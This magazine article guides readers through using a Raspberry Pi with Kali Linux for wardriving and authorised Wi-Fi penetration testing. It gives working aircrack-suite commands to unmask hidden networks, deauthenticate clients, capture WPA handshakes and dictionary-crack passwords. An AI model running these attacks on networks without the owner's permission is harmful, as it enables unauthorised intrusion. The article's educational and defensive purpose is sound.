Rasp­berr y Pi pro­tec­tion!

The best of­fence is a strong Rasp­berry Pi de­fence, cries Nate Drake, as he charges into the fray wield­ing a tiny sin­gle-board PC and his Linux knowl­edge.


Your Rasp­berry Pi can be used as much more than a hob­by­ist’s com­puter. As a sep­a­rate ma­chine, you can em­ploy it to im­prove the se­cu­rity of your home or of­fice net­work. Over the fol­low­ing pages, you’ll learn how to trans­form your Pi into a wire­less at­tack plat­form us­ing the pen­e­tra­tion OS Kali, ca­pa­ble of hack­ing net­works.

The Pi can also func­tion as a buf­fer be­tween your com­puter and po­ten­tial mal­ware. For this rea­son, you’ll also dis­cover how to use it as an ad-block­ing DNS server with Pi-hole, and a sani­tiser for re­mov­ing harm­ful files from USB sticks be­fore you insert them into your PC.

More ex­pe­ri­enced users may also en­joy our guide on set­ting up your Pi as a net­work hon­ey­pot. This al­lows your Pi to mas­quer­ade as a full-blown web server com­plete with dummy files. All ac­tiv­ity by hack­ers is recorded and no changes they make will af­fect other de­vices on your net­work, giv­ing you cru­cial insight into who wants to ac­cess your data.

We start with the sub­tle art of Wardriv­ing: driv­ing around in a ve­hi­cle, while us­ing a com­puter to search for vul­ner­a­ble wire­less net­works to ex­ploit. Wire­less hack­ing soft­ware is freely avail­able over the in­ter­net. Small com­put­ers like the Rasp­berry Pi are also very easy to power and con­ceal. As such, Wardrivers no longer re­quire a team of men in a white van to break into wire­less net­works. In­deed, in re­cent years there have also been ex­am­ples of War­cy­cling and Wardron­ing.

This guide fo­cuses on how you, as an eth­i­cal hacker, can per­form pen­e­tra­tion tests on routers and IoT de­vices to make sure they’re less vul­ner­a­ble to this form of ex­ploita­tion.

Be­fore we be­gin, we’d like to of­fer the usual disclaimer that you should only per­form pen­e­tra­tion test­ing on net­works with the per­mis­sion of the owner, even (and es­pe­cially) if you feel that their se­cu­rity is par­tic­u­larly lax.

As you’re act­ing legally, there is no par­tic­u­lar need to em­u­late Wardrivers fully by strap­ping your Pi onto a drone or ve­hi­cle. How­ever, we en­cour­age you to part­ner up with a fel­low pen-tester and fo­cus your Wardriv­ing at­tempts on each other’s net­works in­stead of your own. This will make for a much more re­al­is­tic test, as you can also see how easy it is for a stranger to gain phys­i­cal ac­cess to the area where their net­work is based. It’s also a good deal more fun!

At the Wardriver wheel

To get started as a Wardriver, you’ll need re­quire a Rasp­berry Pi that sup­ports wire­less such as the Rasp­berry Pi 3 or Rasp­berry Pi Zero W. You’ll also need a mi­croSD card at least 16GB in size to install Kali.

All of the steps out­lined be­low can be run from the com­mand line, so tech­ni­cally you could boot your Pi and con­nect via SSH from a lap­top or sim­i­lar. How­ever, it makes more sense as a Wardriver to con­nect your Pi to an ex­ter­nal dis­play such as the of­fi­cial Rasp­berry Pi seven-inch touch­screen dis­play. This will save space, par­tic­u­larly if you install an on­screen key­board such as match­box-key­board.

If you plan to use your Wardriv­ing Pi in a ve­hi­cle, con­sider ei­ther con­nect­ing it to a por­ta­ble bat­tery pack or, bet­ter yet, to your car’s lighter socket. Which­ever power source you use, make sure it matches the Pi’s re­quire­ments (5V, 2.5A).

You’ll also need a wire­less adap­tor that can be con­nected via USB and is com­pat­i­ble with the air­crack-ng suite, in that it can en­ter mon­i­tor­ing mode and per­form packet in­jec­tion. When re­search­ing this ar­ti­cle we used the Rack­soy Pro­fes­sional Ralink 5370 (avail­able from Ama­zon UK for around £6).

If you’re pen-test­ing your own net­works or a friend’s then it’s not very likely you’ll need to map out ex­actly where they are as you’ll al­ready know! How­ever, Wardrivers some­times make use of GPS de­vices when run­ning kismet to be able to lo­cate tar­get net­works in their area.

As an eth­i­cal hacker, you might also wish to do this in or­der to seek out rogue Wi-Fi APs in your or­gan­i­sa­tion, which can make your net­work more vul­ner­a­ble. There are a num­ber of GPS de­vices that are com­pat­i­ble. For this ar­ti­cle we used the Glob­alSat BU-353-S4 USB, which are avail­able for around £30 on Ama­zon UK.

If you do want to plot Wi-Fi net­works, open Ter­mi­nal on Kali and run apt-get install gpsd gpsd-clients . This in­stalls the ba­sic GPS soft­ware. Con­nect the GPS de­vice to a USB port on the Pi and run dmesg | tail -n 5 to find out where it’s mounted: for ex­am­ple, /dev/ttyUSB0.

Start the GPS Dae­mon at this lo­ca­tion, such as gpsd / dev/ttyUSB0 . Next, edit the kismet con­fig­u­ra­tion file by run­ning nano etc/kismet/kismet.conf. Un­com­ment the lines gp­stype=se­rial and gps­de­vice=/dev/rf­comm0 by re­mov­ing the # at the start. Re­place rf­comm0 with the ac­tual lo­ca­tion of the GPS de­vice, for ex­am­ple ttyUSB0 , then press Ctrl+X, Y, then re­turn to save and exit.

Start the GPS de­vice with gpsd /dev/ttyUSB0 , then run kismet -l . You should now see the GPS data dis­played in the kismet win­dow.

This is au­to­mat­i­cally saved to an .netxml file in your home folder. You can use the pro­gram giskismet to trans­form this into a .kml file, which is com­pat­i­ble with map soft­ware like GoogleEarth. First install the pro­gram with apt-get install giskismet , then run it on the .netxml file: for ex­am­ple, giskismet -x cap­ture1-01.kismet.netxml .

Next, use the com­mand giskismet -q “se­lect * from wire­less” -o <file­name>.kml to cre­ate the .kml file it­self.

In the words of Girl­sagain­stBoys, you can’t fight what you can’t see. This can lead some net­work man­agers and home users to think that us­ing a hid­den Wi-Fi net­work will pro­tect them from Wardriv­ing as a hacker would need to know both the name of the wire­less net­work and the pass­word.

Hid­den net­works are in fact ex­tremely easy to de­tect. Us­ing Ter­mi­nal in Kali, sim­ply run airo­dump-ng <in­ter­face> : airo­dump-ng wlan1­mon for ex­am­ple, to list nearby net­works. Any hid­den net­works will be listed, and only the ESSID (net­work name) is hid­den.

Run airo­dump-ng once again to fo­cus on this spe­cific net­work us­ing its MAC ad­dress, such as airo­dump-ng -c 1 --bssid CC:61:E5:CE:90:92 wlan1­mon . This will list any clients at­tached to the hid­den net­work.

Fi­nally, fol­low the steps in the guide to open a new tab in Ter­mi­nal and try to deau­tho­rise one or more of the de­vices, adding the -c op­tion to tar­get a spe­cific client. For ex­am­ple: aire­play-ng -0 5 -a C:61:E5:CE:90:92 -c 10:9A:DD:B3:48:0B wlan1­mon If you’re suc­cess­ful, when you re­turn to the orig­i­nal airo­dump-ng Ter­mi­nal win­dow, you’ll see the name of the hid­den Wi-Fi net­work has now ap­peared un­der ‘ESSID’.

Help­ful hand­shakes

When a client con­nects to a WPA-se­cured AP (Ac­cess Point), it en­gages in a four-way handshake. The AP ini­tially sends a un­en­crypted nonce value to the client. The client then gen­er­ates its own en­cryp­tion key and nonce, and cre­ates a tran­sient key us­ing its own nonce and the AP’s. It then sends an un­en­crypted mes­sage to the AP con­tain­ing this key. The AP can then ex­tract the client’s nonce and gen­er­ate the en­cryp­tion keys. It mes­sages the client to ver­ify it’s the same de­vice and asks if the client is ready to ex­change en­cryp­tion keys. The client re­sponds and the con­nec­tion be­tween it and the AP is se­cured.

This is an over­sim­pli­fi­ca­tion of how wire­less net­work­ing op­er­ates, but it’s im­por­tant you un­der­stand this in gen­eral terms, as cap­tur­ing the data pack­ets used dur­ing hand­shakes is a cru­cial first step in break­ing into a wire­less net­work.

As you’ll see from the guide ( right), it’s easy to record data pack­ets from a wire­less net­work and cap­ture hand­shakes. You can, how­ever, in­crease your net­work se­cu­rity through us­ing strong Wi-Fi pass­words and chang­ing them reg­u­larly.

Pass­word crack­ing

If you fol­low the steps in the guide to cap­ture data us­ing airo­dump-ng, you’ll find a data cap­ture file with the ex­ten­sion . cap sit­ting in the /root/kali home folder cap­ture-01.cap, say.

If the cap­tured data con­tains hand­shakes be­tween clients and the tar­get AP, you can per­form a dic­tionary at­tack on the pass­word us­ing air­crack-ng. This util­ity works by us­ing a list of com­mon pass­words as well as words from the dic­tionary. You can find a num­ber of pop­u­lar pass­word lists on­line, in­clud­ing that used by pass­word crack­ing util­ity JohntheRip­per, which comes pre­in­stalled in Kali.

To down­load the John the Rip­per pass­word list, open Ter­mi­nal and run: wget http://down­loads.skullse­cu­rity.org/pass­words/john.txt. bz2

Ex­tract the file by run­ning bzip2 -d john.txt.bz2 then be­gin try­ing to crack the Wi-Fi pass­word with air­crack-ng -w john.txt <cap­ture-file-name> , for ex­am­ple air­crack-ng -w john.txt cap­ture-01.cap .

The Rasp­berry Pi 3 can check around 500 pass­words a sec­ond which sounds im­pres­sive un­til you re­alise pass­word lists can con­tain mil­lions of words. As air­crack-ng can be run off­line, we sug­gest you trans­fer the cap­ture file to a desk­top ma­chine or use cloud com­put­ing to crack the pass­word.

The speed at which you crack the pass­word will also be de­ter­mined by the qual­ity of the pass­word list. See https:// github.com/danielmiessler/SecLists/tree/mas­ter/ Pass­words for a more com­pre­hen­sive list of pass­words. Be warned that some of these are well over 100MB.

If the tar­get AP sup­ports WPS, you may be able to break in us­ing the Rasp­berry Pi alone with­out cap­tur­ing or crack­ing any handshake data. See the Crack WPS with Reaver box­out ( be­low) for help with this.

Wardriv­ing works best when you’re near the tar­get net­work (the clue is in the name) and there are few other sources of wire­less in­ter­fer­ence. If you want to make sure your net­work is safe at a range or find your cur­rent wire­less card is im­prac­ti­cal for pen-test­ing, con­sider us­ing a larger an­tenna ( seethep­re­vi­ous‘Yesy­ou­can­tenna!’box­out).

Even de­vices that are ad­ver­tised as Linux com­pat­i­ble and/or you’ve used pre­vi­ously with Kali Linux on a desk­top ma­chine may not nec­es­sar­ily work with the ver­sion of the

Linux ker­nel you’re us­ing on the Pi. Make sure to re­search thor­oughly be­fore get­ting started.

If you boot all de­vices off a net­work but are still un­able to cap­ture hand­shakes, you may have more joy by tar­get­ing in­di­vid­ual clients. See the pre­vi­ously men­tioned sec­tion on hid­den net­works for de­tails on how to do this.

Both dic­tionary and brute force at­tacks on Wi-Fi pass­words will take much longer on the Pi than a reg­u­lar com­puter. We sug­gest you cap­ture your files on the Pi, then trans­fer them else­where, for ex­am­ple to a desk­top ma­chine. If you’ve a few shekels to spare, con­sider crack­ing WPA2 pass­words us­ing cloud com­put­ing such as the Ama­zon Linux AMI, which can at­tempt dic­tionary and brute­force at­tacks us­ing GPUs, which con­sid­er­ably speeds up the process.

If you’ve been suit­ably ter­ri­fied by what you’ve read here make sure to ap­ply what you’ve learned and en­cour­age your friends/clients to use WPA2-AES en­cryp­tion where pos­si­ble and dis­able WPS on all de­vices. If you dis­cov­ered any lurk­ing rogue APs, you may also want to ask them to draft up a pol­icy for gen­er­at­ing wire­less net­works in their work­place.

Keep an eye in your area for War Chalk­ing. In­spired by the Hobo signs of yes­ter­year, these alert fel­low Wardrivers to var­i­ous kinds of net­works.

Use soft­ware like Google Earth to dis­play the .kml cre­ated by giskismet. This is an ex­cel­lent way to find rogue ac­cess points.

Newspapers in English

Newspapers from Australia

© PressReader. All rights reserved.